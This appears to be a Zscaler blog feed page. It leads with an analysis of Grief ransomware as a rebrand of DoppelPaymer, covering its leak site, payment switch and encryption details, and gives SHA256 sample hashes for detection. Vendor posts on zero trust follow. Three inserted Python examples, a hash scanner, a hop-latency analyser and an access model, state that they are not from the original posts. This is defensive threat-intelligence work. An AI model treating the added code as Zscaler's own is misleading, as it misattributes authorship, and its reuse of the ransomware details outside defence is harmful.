Research Blogs Feed
Zscaler Blog — News and views from the leading voice in cloud security.

DoppelPaymer Continues to Cause Grief Through Rebranding

In early May 2021, DoppelPaymer ransomware activity dropped significantly. Although the DoppelPaymer leak site still remains online, there has not been a new victim post since May 6, 2021. In addition, no victim posts have been updated since the end of June. This lull is likely a reaction to the Colonial Pipeline ransomware attack, which occurred on May 7, 2021. However, the apparent break is actually due to the threat group behind DoppelPaymer rebranding the ransomware under the name Grief (aka Pay OR Grief).

An early Grief ransomware sample was compiled on May 17, 2021. This sample is particularly interesting because it contains the Grief ransomware code and ransom note, but the link in the ransom note points to the DoppelPaymer ransom portal. This suggests that the malware author may have still been in the process of developing the Grief ransom portal. Ransomware threat groups often rebrand the name of the malware as a diversion. In this blog, we will compare the similarities between DoppelPaymer and Grief ransomware.

Both ransomware leak sites are nearly identical, including shared code that displays a captcha to prevent automated crawling, as shown in Figure 1.

Figure 1. Grief ransomware (left) and DoppelPaymer (right) captcha

The main landing page has changed the term "latest proofs" to "griefs in progress" and "latest leaks" to "complete griefs". The victim-specific leak page layouts are also identical, as shown below in Figure 2, containing the victim's URL, organizational description, images of stolen data, example stolen data files, and a list of machines that were compromised.

Figure 2. Grief ransomware (left) and DoppelPaymer (right) victim leak pages

The Grief ransom portal has some differences from the DoppelPaymer portal.
In particular, the ransom demand payment method is Monero (XMR) instead of Bitcoin (BTC). This switch in cryptocurrencies may be in response to the FBI recovering part of the Colonial Pipeline ransom payment. The Grief ransom portal, however, kept the same live chat code that allows victims to resume a previous conversation or to start a new conversation, as shown in Figure 3.

Figure 3. Grief ransomware (left) and DoppelPaymer (right) victim ransom portals

The Grief ransomware portal and leak site also attempt to weaponize the European Union's General Data Protection Regulation (GDPR) to pressure businesses into paying a ransom to avoid potential fines.

The malware code differences between DoppelPaymer and Grief are also relatively minimal. Grief samples removed the embedded ProcessHacker binaries. However, Grief still retains the code to decrypt data from the binary's .sdata section. The Grief string encryption algorithm is similar to DoppelPaymer's, except the RC4 key was increased from a length of 40 bytes to 48 bytes. The vast majority of the two codebases are very similar, with identical encryption algorithms (2048-bit RSA and 256-bit AES), import hashing, and entry point offset calculation.

Conclusion

Grief ransomware is the latest version of DoppelPaymer ransomware, with minor code changes and a new cosmetic theme. The threat group has been very active since the release of Grief in the middle of May 2021. However, they have been successful in maintaining a low profile so far. This is in light of recent high-profile attacks including the Colonial Pipeline hack by Darkside ransomware and the Kaseya supply-chain attack by REvil.

Indicators of Compromise (IOCs)

The following IOCs can be used to detect Grief ransomware.
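One way to put the hashes from the Samples table that follows to work is a small on-disk scanner. The Python below is an added example, not code from the original post or from Zscaler: it embeds the five SHA256 hashes the post lists, hashes files in a streaming fashion so large files need not fit in memory, normalises digests before comparison, and reports matches. The function names, the chunk size and the self-check's constructed test file are this example's own.

```python
"""Hash-based IOC matching for the Grief ransomware samples listed in this post.

Added example, not code from the original post or from Zscaler. The SHA256
values come from the post's Samples table; everything else (function names,
chunk size, the self-check's test content) is constructed for illustration.
"""
import hashlib
import os
import tempfile
from typing import Dict, List, Optional, Tuple

# SHA256 hashes from the post's Samples table, mapped to the module name given there.
GRIEF_IOCS: Dict[str, str] = {
    "b5c188e82a1dad02f71fcb40783cd8b910ba886acee12f7f74c73ed310709cd2": "Grief ransomware sample",
    "91e310cf795dabd8c51d1061ac78662c5bf4cfd277c732385a82f181e8c29556": "Grief ransomware sample",
    "dda4598f29a033d2ec4f89f4ae687e12b927272462d25ca1b8dec4dc0acb1bec": "Grief ransomware sample",
    "0864575d4f487e52a1479c61c2c4ad16742d92e16d0c10f5ed2b40506bbc6ca0": "Grief ransomware sample",
    "b21ad8622623ce4bcdbf8c5794ef93e2fb6c46cd202d70dbeb088ea6ca4ff9c8": "Grief ransomware sample (early build)",
}


def normalize_hash(digest: str) -> str:
    """Lower-case and strip a hex digest so feed/report formatting differences do not cause misses."""
    return digest.strip().lower()


def hash_bytes(data: bytes) -> str:
    """SHA256 hex digest of an in-memory buffer."""
    return hashlib.sha256(data).hexdigest()


def hash_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream a file through SHA256 one chunk at a time (constructed 1 MiB chunk size)."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def match_hash(digest: str, iocs: Dict[str, str] = GRIEF_IOCS) -> Optional[str]:
    """Return the IOC label for a digest, or None if it is not a known sample."""
    return iocs.get(normalize_hash(digest))


def scan_directory(root: str, iocs: Dict[str, str] = GRIEF_IOCS) -> List[Tuple[str, str, str]]:
    """Walk root and return (path, sha256, label) for every file whose hash is in iocs.

    Files that cannot be read (permissions, races with deletion) are skipped so one
    unreadable file does not abort the whole scan.
    """
    hits: List[Tuple[str, str, str]] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                digest = hash_file(path)
            except OSError:
                continue
            label = match_hash(digest, iocs)
            if label:
                hits.append((path, digest, label))
    return hits


def self_check() -> bool:
    """Write one constructed (benign) file to a temp directory and confirm the scanner
    flags it when its digest is in the IOC set and ignores it against the real Grief set."""
    sample = b"constructed benign test content, not malware\n"
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "test.bin")
        with open(path, "wb") as fh:
            fh.write(sample)
        planted = {hash_bytes(sample): "constructed test entry"}
        flagged = scan_directory(tmp, planted)
        clean = scan_directory(tmp, GRIEF_IOCS)
    return len(flagged) == 1 and flagged[0][2] == "constructed test entry" and clean == []


if __name__ == "__main__":
    import sys
    for path, digest, label in scan_directory(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"MATCH {label}: {path} ({digest})")
```

Run it as `python grief_ioc_scan.py /path/to/scan`. Exact-hash matching only catches these specific builds; a repacked or later sample will not match, so hash IOCs complement, rather than replace, behavioural detection.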
Samples

SHA256 Hash                                                        Module Name
b5c188e82a1dad02f71fcb40783cd8b910ba886acee12f7f74c73ed310709cd2   Grief ransomware sample
91e310cf795dabd8c51d1061ac78662c5bf4cfd277c732385a82f181e8c29556   Grief ransomware sample
dda4598f29a033d2ec4f89f4ae687e12b927272462d25ca1b8dec4dc0acb1bec   Grief ransomware sample
0864575d4f487e52a1479c61c2c4ad16742d92e16d0c10f5ed2b40506bbc6ca0   Grief ransomware sample
b21ad8622623ce4bcdbf8c5794ef93e2fb6c46cd202d70dbeb088ea6ca4ff9c8   Grief ransomware sample (early build)

Wed, 28 Jul 2021 11:40:06 -0700 Brett Stone-Gross

Five Ways Banks Can Make the Most of Hybrid Infrastructures

To thrive in a fast-changing economic landscape, the finance sector has had to reinvent itself by embracing cloud and mobile computing. Even though financial organisations have made significant progress toward digital transformation, the adoption of new technologies is often overlaid on legacy IT infrastructure. This is holding the financial industry back from reaping the benefits of their digitalisation efforts. How can financial institutions manage to succeed in a polarised world of legacy infrastructures and modern cloud-based applications?

The banking industry is changing rapidly

Advances in technology have opened the market to disruptive digital competitors. The rise of so-called challenger banks has developed in line with consumers' readiness to embrace e-commerce through smartphones and e-payments. This market dynamism means that customers have become more demanding and expect real-time, customized, and seamless experiences in their daily interactions with their banks. Digital innovation and business agility are key for financial institutions to not only maintain their existing customer base, but also to attract new customers, grow market share, and address growth opportunities in new market segments.
Despite the need to maintain strict compliance with financial regulations and governance controls, the finance sector is evolving fast, and digital transformation is well underway. To mitigate the risk of losing customers, financial organisations face the challenge of replicating the level of in-person customer service that they used to deliver in their branches with similarly outstanding digital experiences. This is a core reason that user experience is a top business priority for most financial organisations, not only for their customers but also for their employees.

Cloud apps do not equal a cloud-ready infrastructure

The challenge for financial organisations is that, although they want to adopt new IT solutions to enable transformation, they have to abide by strict policies to meet the requirements of their regulators. As such, they are risk-averse and tend to stick with their legacy IT infrastructure. Their reluctance to interfere with their core banking-related IT systems, many of which have been in place for 30+ years, leads to a hybrid IT setup.

While there are various reasons why it is difficult to implement changes in legacy architectures, the financial industry, like many other industries, is still modernising its user-oriented front ends. However, unlike other industries, banks are struggling to live in hybrid cloud and on-premises environments, for the same regulatory reasons that are holding them back from fundamentally modernising. They have to be compliant with the policies and regulatory requirements governing their data flows and at the same time have to balance security and user experience for their new cloud-based initiatives. While financial organisations are embracing mobile and cloud technology to foster company-wide digital transformation, they still have to consider the security of the data flows that are leaving their boundaries.
With the transition to cloud-based applications, they must enable their workforce to use the internet as the path to access apps, without compromising security. For financial institutions to maximise the full potential of the cloud in their hybrid infrastructures while still maintaining the utmost security, they would be wise to consider the following five key steps.

1: Consider the user experience

Banks traditionally had central headquarters supported by branch offices. In traditional "hub-and-spoke" networking environments, all these locations connect to a single corporate network and link to a central private data centre. In this setup, all data is routed back into the data centre via expensive MPLS backhaul links. This all worked fine when desktop apps all lived on-premises, but it no longer functions when applications have moved to the cloud. The detour from each user via the corporate network to break out to cloud-based applications adds latency and therefore harms the user experience.

For example, Office 365 is a common application that lives in the cloud, and its adoption creates a surge in cloud-bound data traffic that requires a huge amount of bandwidth. In a legacy environment, data traffic flows from the branch offices to the data centre over MPLS networks, then outbound through the data centre security stack to the Microsoft clouds hosting Office 365. It then must double back through the inbound security stack into the data centre, then back out to the branch offices. This multi-hop, multi-security-check route introduces huge amounts of latency and hinders Office 365 performance.

Financial institutions need to provide staff with seamless access to their cloud-based applications. They can overcome the latency challenge by giving staff direct connectivity to the internet and their cloud-based applications.

2: Provide secure access from anywhere

The banking sector's journey to the cloud was halted abruptly by the COVID-19 pandemic.
Within a matter of days, thousands of office- and branch-based staff were required to work remotely. Unfortunately, this transition was not as seamless as one might have hoped, due to organisations' existing "hub & spoke" infrastructures. Ultimately, remote workers were sending data on an even more convoluted journey to access their applications.

Going back to the Office 365 example: traffic originates from a VPN client and flows into and out of the data centre via a linear stack of appliances including a load balancer, distributed denial of service (DDoS) protection, firewall, VPN concentrator, intrusion prevention system (IPS), SSL, data loss prevention (DLP), and/or advanced threat protection (ATP). Again, the inherent latency in the traffic route means that Office 365 performance decreases, often to the frustration of the user. They might even feel tempted to bypass VPN controls, which could open the corporate network to attack.

Relying on VPN for remote connectivity may be a proven method, but unfortunately the VPN was invented before the age of the cloud and therefore no longer provides the most efficient route; rather, it acts as a performance killer. A VPN connection not only slows down traffic but opens the whole network to the user and application, potentially leading to security issues. Banks should start looking to free themselves from VPNs and look to more modern approaches that provide a higher level of security and prohibit network access to unattended users.

Establishing and maintaining secure remote connections to cloud applications does not need to be a performance killer or an attack vector. A zero trust-based solution can enable granular, direct, and secure user-to-application access and can be implemented on top of legacy infrastructures.
3: Combine cost and complexity savings with heightened security

An additional point to review in hybrid setups is the Virtual Desktop Infrastructure (VDI), which has been broadly adopted in the financial sector for security and data residency restrictions. Instead of accessing the application directly, virtualisation enables the visualisation of information on-screen, without the ability to change or extract data, as the application is still running on the server and hence the data does not leave the corporate boundary. VDI technology enables remote users to connect to core systems, email, and other applications via bring your own device (BYOD), mitigating classic issues such as data exposure and theft.

However, desktop virtualisation is a complex undertaking, and performance of the virtual desktop can again prove an issue for the user, as the transmission of the virtual image relies on network connectivity. The remote access path once more needs to involve a VPN to allow VDI access, and only in the last step provides the app view. Furthermore, these solutions are not only notoriously difficult to set up and costly to maintain, but are over-used and add an additional security risk, particularly during the pandemic.

Financial organisations must be careful not to remedy an underperforming network with additional infrastructure. This not only adds further complexity and cost but also increases risk. As organisations travel further down the path of building upon their legacy infrastructure, they become less agile, innovative, and competitive. This is the exact opposite of the ultimate aim of their digitalisation journey. Reconsider the costly and complex setup of a VDI infrastructure. Complementing it with a cloud-based security approach can help to control what the user has access to, and adds centralised visibility and control alongside a faster and consistent user experience.
4: Direct-to-cloud access versus mobile "appification" and BYOD

Banks have traditionally relied on fat clients and desktop systems in their offices, which provide a completely different look and feel from what staff are used to on their personal devices for private browsing and social media. To provide the same experience, banks are considering allowing BYOD. CIOs in banking and financial services increasingly manage projects that extend primary business functions such as core banking systems (CBS) to mobile workers through app extensions as a means to survive in the modern banking world. Because financial institutions can't give direct access to legacy infrastructures, in some parts of the world they invest heavily in mobile apps as a workaround to get work done from the field.

The appification of these core banking functions aims to provide field employees with a simple, speedy, and secure method of helping customers make decisions and engage in services remotely. To provide and collect the best information for quotes, policies, coverage details, terms and conditions, and other data, field staff need access to core banking and insurance systems. One solution to the remote access challenge is creating mobile apps for loan origination and policy quote engines, packaging them inside a mobile device manager (MDM) container, and using real-time web services or APIs that connect to core systems. But appification creates new headaches for IT leads, like increased development overhead, frequent change requests, or higher demand for end-user requests. Such an approach adds complexity to the overall IT environment.

Instead of building mobile apps, IT teams should be looking for more effective ways to give field staff secure access to core business functionality through the cloud. Ubiquitous mobile broadband access, increasing cellular speeds over LTE (now moving to 5G), and public Wi-Fi hotspots facilitate remote work from anywhere.
Allowing employees access to CBS applications from the field with the same ease of access as from headquarters or a branch office means there is no need for mobile-app extensions, but for secure BYOD.

5: Audit support through visibility

Financial institutions always need to think about upcoming audits and other regulatory requirements. An internal IT audit challenges the organisation's ability to understand its risk exposure and analyses the efficiency of an organisation in detecting and reporting data breaches. Additionally, an organisation needs to understand whether it has appropriate measures in place to cope with these risks. As financial organisations seek new methods of creating value, address new target groups, and keep pace with digitalisation, they still need to ensure they have insight into all data streams in response to audits. CIOs should always know who is in the network and what they have access to.

IT decision-makers need to anticipate what supervisory developments mean for their organisation and make decisions based on these, as well as on their own threat analysis and cyber programmes. The most important parameter is therefore visibility into all employees' on- and off-network traffic, regardless of where they are working and which device they are using to access their applications. With the rise of cloud and mobility, financial institutions face the challenge of keeping track of all data flows within their organisations' range. They need a single pane of glass to regain visibility into that traffic, and the cloud can be a key enabler. To fulfil the requirement of an internal IT audit and for visibility into all data streams in the fight against cybercrime, a highly integrated cloud security platform reduces the complexity of tasks and facilitates auditing processes.
Zero trust helps to overcome limitations of legacy infrastructures

A zero trust architecture typically employs a cloud security model to support the fundamental principles of a default-deny posture and follow-the-user policy controls. In this way, zero trust extends security protection to mobile devices so that remote staff can access core applications with the same level of security controls as staff based in the office. Users are never placed on the network, and instead connect only to applications as allowed by configured business policies. This contrasts with traditional VPN access, which tenuously extends the corporate network beyond the limits of its effective control. Additionally, users and devices are authenticated before access to an application is granted.

As each user is directed to an application, regardless of whether it resides in the data centre or in the cloud, zero trust enables the fastest connection between the user's location and the application's hosting location. There is no longer a need for backhauling through the corporate security stack, thereby considerably improving application performance and user experience.

Digitalisation efforts are well underway in the financial industry. However, to gain maximum benefit from the cloud, financial institutions can do more than just implement cloud-based front-end apps. Zero trust enables them to overcome the limitations of their legacy infrastructures, as this security approach adds performance, security, and user experience to cloud-based apps.

Wed, 28 Jul 2021 08:00:01 -0700 Sudip Banerjee

National Cybersecurity Center of Excellence (NCCoE) Selects Zscaler as Technology Collaborator for Implementing a Zero Trust Architecture Project

Strengthening the nation's cybersecurity requires more — and better — collaboration between the public and private sectors.
That's why we are honored to announce that the National Institute of Standards and Technology (NIST)'s National Cybersecurity Center of Excellence (NCCoE) has selected Zscaler as one of its partners in a new Zero Trust Architecture Project. Zscaler will work alongside the NCCoE and other top Federal IT vendors on different approaches for implementing zero trust architectures.

"We received an overwhelming response from the vendor community on this important project," said Natalia Martin, acting director of the NCCoE, in the announcement. "Implementing a zero trust architecture has become a Federal cybersecurity mandate and a business imperative."

Top industry leaders will come together to demonstrate various approaches to implementing a zero trust architecture. These approaches will use a diverse mix of products and capabilities — and the effort will provide valuable "how to" guidance and lessons learned.

As Federal employees continue to work from anywhere, and more and more applications move from inside the data center to outside the network perimeter, network and security teams are shifting their focus from securing the network to protecting users, devices, and business resources.

As we like to say at Zscaler, zero trust is a team sport — and the NIST NCCoE is taking the initiative to bring together best-of-breed zero trust leaders. We're committed to collaborating with customers and partners to demonstrate different, practical approaches to implementing a zero trust architecture. As we know, no one solution fits every situation. Zscaler is honored to be a part of this coalition working side by side to realize the opportunity for zero trust to strengthen every agency's cyber defenses.

For more information, see NCCoE's press release here.
Tue, 27 Jul 2021 07:00:02 -0700 Stephen Kovac

Seeing the Invisible: Network Monitoring in a Zero Trust World

Application transformation has upended traditional monitoring approaches: applications reside in SaaS, infrastructure gets deployed in public clouds, and users (employees, partners, and customers) access assets from mobile devices well outside the corporate domain. Business no longer takes place on a trusted corporate network or inside a well-defined security perimeter. The legacy hub-and-spoke network with a castle-and-moat security model that worked well in the pre-cloud and pre-mobile world does not work anymore.

Cloud security using Zscaler's Zero Trust Exchange makes the internet a safe place to do business by securely connecting any user, device, and application, regardless of either's location. The Zero Trust Exchange is a modern approach that enables fast and secure connections to corporate applications, assets, and data using the internet as the corporate network. People can connect from anywhere, using any device, and maintain the same level of security and data protection. The zero trust principle of least-privileged access provides comprehensive security using context-based identity and policy enforcement.

Traditional firewalls advertise connections to your applications through your network security perimeter directly to the internet. But bad actors can also discover these same network "holes." VPNs put remote users onto the network, where a single breach can laterally compromise the rest of the networks and systems behind the secure login. Both expand your attack surface. The Zero Trust Exchange makes apps invisible and only accessible to authorized users. The network ceases to have holes because it isn't a defense wall. Zero trust creates a zero attack surface.

Historically, diagnosing application and network problems for remote users accessing internal applications has always been a challenge due to the lack of monitoring data.
In VPN environments, network paths within the VPN tunnel are always encapsulated and hidden from view. Good luck finding that wireless latency issue or the gateway that is dropping packets! At first glance, it would seem that moving to a zero trust architecture would make this problem worse: now, internal applications are hidden entirely from the network. Traditional network path analysis techniques like traceroute and ping no longer work. What can you traceroute or ping to when the application is no longer visible on the network?

Enter Zscaler Digital Experience (ZDX). ZDX provides a unique monitoring overlay for the Zero Trust Exchange and provides deep visibility into the performance of both public and private applications. ZDX's recent integration with Zscaler Private Access (ZPA) makes it possible to understand user experience from an application and network perspective. ZDX provides application performance statistics for every employee every few minutes and combines that with network path analytics to the ZPA Service Edge (with complete end-to-end path visibility coming soon) using CloudPath (see Figure 1).

Figure 1: ZDX exposing hop-by-hop network details for an internal application protected by ZPA

CloudPath leverages Zscaler's integrated Client Connector agent to measure hop-by-hop network performance every few minutes, identifying places where latency and packet loss might be affecting application performance. CloudPath makes use of ZDX's unique 360-degree monitoring (see my recent blog here), where path analysis is not only from the client endpoint outbound but instead takes advantage of the Zero Trust Exchange to view the network path from the internet inbound. This visibility exposes performance problems caused by server delays, DNS resolution times, weak Wi-Fi, local ISP latency, internet backbone issues, and more. Everything that used to be hidden in traditional VPN environments can now be monitored and measured.
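To make the hop-by-hop idea concrete, here is an added example that is not ZDX or CloudPath code and not part of the original post. It performs the kind of per-hop analysis the paragraph above describes over constructed probe data: several RTT samples per hop, with None standing for a lost probe, then per-hop loss and median latency, with the hop that introduces a large latency jump or excessive loss flagged as the likely culprit. The hop addresses, RTT values, thresholds and function names are all constructed for illustration.

```python
"""Per-hop latency and loss analysis over constructed traceroute-style probe data.

Added example, not ZDX/CloudPath code and not from the original post. The path,
RTT values and thresholds below are constructed for illustration.
"""
from statistics import median
from typing import Any, Dict, List, Optional, Tuple

# Constructed sample: for each hop, the RTTs (ms) of five probes; None = no reply (loss).
SAMPLE_PATH: List[Dict[str, Any]] = [
    {"hop": 1, "address": "192.168.1.1",  "rtts": [1.2, 1.4, 1.1, 1.3, 1.2]},       # Wi-Fi gateway
    {"hop": 2, "address": "100.64.0.1",   "rtts": [9.8, 10.4, 9.9, None, 10.1]},    # ISP first hop
    {"hop": 3, "address": "198.51.100.7", "rtts": [11.0, 11.3, 10.9, 11.1, 11.2]},  # ISP core
    {"hop": 4, "address": "203.0.113.9",  "rtts": [48.5, 51.0, None, None, 49.7]},  # congested transit
    {"hop": 5, "address": "203.0.113.42", "rtts": [50.1, 50.4, 49.9, 50.2, 50.0]},  # service edge
]


def summarize_hop(hop: Dict[str, Any]) -> Dict[str, Any]:
    """Loss percentage and median RTT for one hop; the median ignores lost probes."""
    replies = [r for r in hop["rtts"] if r is not None]
    loss_pct = 100.0 * (len(hop["rtts"]) - len(replies)) / len(hop["rtts"])
    return {
        "hop": hop["hop"],
        "address": hop["address"],
        "loss_pct": loss_pct,
        "median_ms": median(replies) if replies else None,
    }


def analyze_path(
    path: List[Dict[str, Any]],
    loss_threshold_pct: float = 20.0,
    jump_threshold_ms: float = 20.0,
) -> Tuple[List[Dict[str, Any]], List[Dict[str, Any]]]:
    """Return (per-hop summaries, flagged hops).

    A hop is flagged when its loss exceeds loss_threshold_pct, or when its median RTT
    rises by more than jump_threshold_ms relative to the previous hop that answered,
    meaning the delay was added between those two hops. A hop that answers nothing
    keeps the previous baseline so the jump is attributed to the next responder.
    """
    summaries = [summarize_hop(h) for h in path]
    flagged: List[Dict[str, Any]] = []
    prev_ms: Optional[float] = None
    for s in summaries:
        reasons: List[str] = []
        if s["loss_pct"] > loss_threshold_pct:
            reasons.append(f"{s['loss_pct']:.0f}% loss")
        if s["median_ms"] is not None:
            if prev_ms is not None and s["median_ms"] - prev_ms > jump_threshold_ms:
                reasons.append(f"+{s['median_ms'] - prev_ms:.1f} ms over previous hop")
            prev_ms = s["median_ms"]
        if reasons:
            flagged.append({"hop": s["hop"], "address": s["address"], "reasons": reasons})
    return summaries, flagged


def flagged_hops(path: List[Dict[str, Any]], **thresholds: float) -> List[int]:
    """Hop numbers that analyze_path flags, for quick checks."""
    return [f["hop"] for f in analyze_path(path, **thresholds)[1]]


if __name__ == "__main__":
    summaries, flagged = analyze_path(SAMPLE_PATH)
    for s in summaries:
        print(f"hop {s['hop']:>2} {s['address']:<14} loss {s['loss_pct']:5.1f}%  median {s['median_ms']} ms")
    for f in flagged:
        print(f"suspect hop {f['hop']} ({f['address']}): {', '.join(f['reasons'])}")
```

With the constructed data, hop 4 is flagged for both 40% loss and a jump of roughly 39 ms over hop 3, while hop 2's single lost probe (20%, not above the threshold) is left alone. One caveat a practitioner will recognise: routers often rate-limit their own ICMP replies, so loss at an intermediate hop that does not propagate to later hops is usually a measurement artefact rather than a real problem, which is why loss and latency jumps are scored separately and why end-to-end figures should be consulted before blaming a hop.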
Replacing your legacy VPN with a zero trust model always had a massive security benefit. Who knew that there was also an enormous benefit for IT operations as well?

Tue, 27 Jul 2021 08:00:01 -0700 Sanjit Ganguli

Winning Over the Boardroom By Enabling the Business Ecosystem

As if managing a constantly changing mix of remote and office workers wasn't messy enough, third-party risk is among the biggest security issues boardrooms are facing following high-profile supply chain failures like the 2020 SolarWinds cyberattack, which showed how a small, isolated risk can cascade into a systemic risk threatening the bigger supply chain ecosystem.

Companies have a lot riding on third-party ecosystems. They can shake up your supply chain and tap into potentially huge pools of value by landing new customers, improving operations by reducing production and delivery times, and delighting your customers with a great experience. As business ecosystems become more complex and geographically dispersed, IT leaders are expected to provide expertise to boards of directors regarding the digital risks posed by third-party relationships. So, how concerned should you be about third-party digital risk? In short—very concerned.

Third-party risks in the digital world

Gartner research shows that more than eight out of ten companies discover third-party risks after conducting due diligence, with over 31 percent of those risks having a material impact on the business. Broadly speaking, a third party is an external entity that your company does business with. This can include service providers, suppliers, vendors, contract manufacturers, distributors, resellers, and auditors, to name a few. It has been a core function of IT to protect company operations and keep the bad guys out of internal networks with firewalls and virtual private networks (VPNs).
With the acceleration of digital transformation, however, it is often necessary to give third-party users access to the organization's most sensitive data. This means making B2B applications and services available to the external supply chain and customers over the internet. A whopping 82 percent of companies give third parties access to all of their cloud-based data. The problem is that you have little insight into your partners' security protocols or the devices they use to connect to your IT and industrial networks.

Misplaced trust in third parties creates security headaches for the board and IT

VPN is one of the traditional methods of connecting third parties to backend systems. A VPN places users directly on the network with full network IP access, allowing them to explore and discover (and potentially snoop on) your private applications and data. This approach has two problems.

Let's start with the user experience. VPN entails forcing the user into a single entry point only to backhaul them somewhere else to be inspected, like a centralized data center or public cloud provider. In other words, you are sending the user over a circuitous route to conduct a traffic security check and thereby slowing down their internet connection.

The expanded attack surface is the other challenge. VPNs are built with an inbound VPN gateway that sits at the edge of the network and listens for inbound pings to confirm reachability. Clustering and load balancing these stacks across multiple ingress points is also necessary to guarantee high availability. If you have this kind of architecture, not only do you have to deal with the listening port on the network, but you also have to deal with the attack surfaces of everything the third-party user can touch and potentially expose to attackers.
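The difference between "everything the third-party user can touch" once a VPN has placed them on the network and a per-application, default-deny policy can be made concrete with a small model. The Python below is an added example, not Zscaler code and not part of the original post: a constructed inventory of applications on one internal segment, a VPN model in which an authenticated user simply receives an address on that segment, and a policy that maps partner groups to named applications with identity and device checks evaluated first. All names, addresses, groups and policy entries are constructed for illustration.

```python
"""Blast radius of a compromised third-party account: network-level VPN access
versus per-application, default-deny policy.

Added example, not Zscaler code and not from the original post. Inventory,
users, groups, addresses and policy entries are constructed for illustration.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class App:
    name: str
    ip: str            # constructed address the app listens on inside the data centre
    sensitivity: str   # constructed label: "low" or "high"


@dataclass
class AccessRequest:
    user: str
    groups: Set[str]
    device_managed: bool   # device posture signal
    mfa_passed: bool       # identity verification signal
    app: str               # the one application being requested


# Constructed internal inventory: everything lives on the 10.10.0.0/24 segment.
INVENTORY: List[App] = [
    App("supplier-portal", "10.10.0.10", "low"),
    App("erp", "10.10.0.20", "high"),
    App("hr-database", "10.10.0.30", "high"),
    App("file-share", "10.10.0.40", "high"),
    App("jump-host", "10.10.0.50", "high"),
]

# Constructed policy: group -> applications that group may reach. Anything not listed
# is denied (default-deny). Note there is no network or subnet anywhere in the policy.
POLICY: Dict[str, Set[str]] = {
    "suppliers": {"supplier-portal"},
    "auditors": {"erp"},
}


def vpn_reachable(inventory: List[App], vpn_subnet: str = "10.10.0.0/24") -> Set[str]:
    """VPN model: the user gets an IP on the segment, so every listener on it is reachable."""
    net = ip_network(vpn_subnet)
    return {app.name for app in inventory if ip_address(app.ip) in net}


def zero_trust_decision(req: AccessRequest, policy: Dict[str, Set[str]] = POLICY) -> Tuple[bool, str]:
    """Evaluate one user-to-application request: identity and device checks first,
    then the application must be explicitly allowed for one of the user's groups."""
    if not req.mfa_passed:
        return False, "deny: identity not verified (MFA)"
    if not req.device_managed:
        return False, "deny: device posture check failed"
    allowed = set().union(*(policy.get(g, set()) for g in req.groups))
    if req.app in allowed:
        return True, f"allow: {req.app} permitted for groups {sorted(req.groups & set(policy))}"
    return False, f"deny: {req.app} not in policy for {sorted(req.groups)} (default-deny)"


def zero_trust_reachable(user: str, groups: Set[str], device_managed: bool, mfa_passed: bool,
                         inventory: List[App], policy: Dict[str, Set[str]] = POLICY) -> Set[str]:
    """Everything the account could reach by requesting every application in the inventory."""
    return {
        app.name for app in inventory
        if zero_trust_decision(AccessRequest(user, groups, device_managed, mfa_passed, app.name), policy)[0]
    }


def blast_radius_report(groups: Set[str]) -> Dict[str, int]:
    """Systems (total and high-sensitivity) a compromised account with these groups can reach
    under each model. The attacker is assumed to hold a working session (managed device,
    MFA already passed), i.e. the worst case for both models."""
    high = {a.name for a in INVENTORY if a.sensitivity == "high"}
    vpn = vpn_reachable(INVENTORY)
    zt = zero_trust_reachable("compromised-partner", groups, True, True, INVENTORY)
    return {
        "vpn_total": len(vpn),
        "vpn_high": len(vpn & high),
        "zero_trust_total": len(zt),
        "zero_trust_high": len(zt & high),
    }


if __name__ == "__main__":
    for grp in ({"suppliers"}, {"auditors"}, set()):
        print(sorted(grp) or "<no group>", blast_radius_report(grp))
```

For a compromised account in the constructed "suppliers" group, the VPN model exposes all five systems (four of them high-sensitivity), while the policy exposes one (none high-sensitivity); an account with no matching group reaches nothing under the policy but still sees the whole segment over the VPN. That contrast is the attack-surface argument of the section above expressed in numbers a board can read.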
Managing third-party security risks to create and protect value

Third-party users are often unaware of the implications and dangers of having over-privileged access, which can put your entire system and operations at risk. It's time to replace this traditional method of connecting third parties to the network, since it no longer works in a world where data and apps are distributed. With a continuous, iterative approach that embodies the principles of zero trust, you can effectively manage your third-party risks:

Secure application connectivity without network access. Never place third-party users directly on your network. Eliminate over-privileged access to critical applications, data, and systems.

Minimize the external and internal attack surface. Assess your attackable surface with our internet attack surface analysis tool. Minimize risk with application microsegmentation.

Enable policy-based access no matter where the user is going or coming from. Create a zero trust, segment-of-one connection between the partner and the resource they need to get to.

Monitor suspicious activity. Assume no user or device is trustworthy and that any of them may be breached. Keep track of every resource a user touches. Continuously verify they are who they say they are and that they are doing only what is necessary for their role.

Four questions you should ask about third-party risk

By overcoming the pandemic-induced stress tests on business operations, IT leaders stepped onto a much bigger stage, extending their influence and role within their companies. With this comes the opportunity to speed up digital transformation for your business ecosystem and add lasting value. So, how can you ensure partners stay productive while staying vigilant against attacks on your company? Here are four questions you should be asking your teams to assess your third-party risks:

How quickly can a vendor or partner get access to our systems today?
Who are the third-party users that need access to our data, applications, and other sensitive info, and what would happen if they were compromised?

What is our approach to granting access to our systems during the different phases of the third-party lifecycle: pre-contract due diligence, contracting, onboarding, monitoring, and termination?

Is third-party access to the network really necessary?

Zero trust makes collaborating with partners simple and safe

The Zscaler Zero Trust Exchange is a modern approach that enables fast, secure connections and allows your partners to collaborate with you from anywhere. Based on the zero trust principle of least-privileged access, it provides comprehensive security using context-based identity and policy enforcement. Zscaler has one big advantage in solving the problem of secure third-party access. Our Zero Trust Exchange runs across 150 data centers worldwide, ensuring that the service is close to your external users, co-located with the cloud providers and applications they are accessing. It guarantees the shortest path between your users and their destinations, providing them with an amazing user experience.

With Zscaler, you can reduce costs by eliminating expensive VPNs, reduce risks by eliminating attack vectors targeted by bad actors, and empower your business to collaborate productively with external partners. It's time to take your business ecosystem to the next level by managing third-party risk with zero trust network access for your private apps. Let us help you take the next steps on your transformation journey.

Read the solution brief: Zscaler Private Access for Secure Third-Party Access
Take a test drive: Zscaler Private Access Interactive

Fri, 23 Jul 2021 10:11:04 -0700 Linda Park

Zero Trust: Security from the Cloud

Data safety and data security are the cause of continuous stress for IT departments in pharmaceutical companies.
